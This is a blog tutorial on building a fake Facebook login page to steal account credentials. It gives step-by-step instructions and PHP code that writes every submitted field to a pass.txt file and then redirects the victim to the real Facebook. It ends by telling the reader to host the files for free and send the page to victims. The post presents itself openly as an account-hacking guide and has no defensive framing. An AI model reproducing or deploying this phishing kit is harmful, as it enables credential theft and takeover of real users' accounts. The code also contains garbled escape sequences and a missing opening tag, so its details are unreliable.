It's More than a Technology blog...

Liked us?

Pin It

Create Facebook Fake Login Page

After a lot of request today I am coming with a post on how to create Facebook fake login page? Some times ago I published an article on different ways to hack Facebook account. That time I told you that phishing is the easiest ways to steal the user details.


Basically Phishing is a fake login page which is use to steal the details of victims. 

Phishing is of two types:-
  1.  Ordinary Phishing Method (old Method)
  2. Modern Phishing Method (Tabnabbing)

I already post an article on hack Facebook password using tabnabbing. But it is the advance phishing method. so normally reader can’t understand it and they yet love to old phishing method.

Follow these steps for create phishing page for Facebook:-

Step 1:- First of all open the Facebook in your browser.

Step 2:- After loading of page, copy the source code by right click on page and save with “facebook.html” extension.

Step 3:- Now open notepad and paste the below code and save it as hi.php. Pass.txt is our database where the user details are stores.


header (‘Location: http://www.facebook.com’);
$handle = fopen(“pass.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>


Step 4:- Open notepad and save to “pass.txt”.

Step 5:- Now Open the Source Code (save in Step 2) in notepad (best notepad++) and find the action tag and replace the address with hi.php (the file which we make in step 3) and save the file.

fb

Step 6:- We have created three file. Now upload all three files on the the free hosting site.

Step 7:- After upload all files on hosting site, open the html file and enter fake user details to check this. and open the pass.txt file if you see the entered details here than all thing is done and if not than check all step again.

Step 8:- Now send Facebook.html file to the victims and you are done .

Twitter Delicious Facebook Digg Stumbleupon Favorites More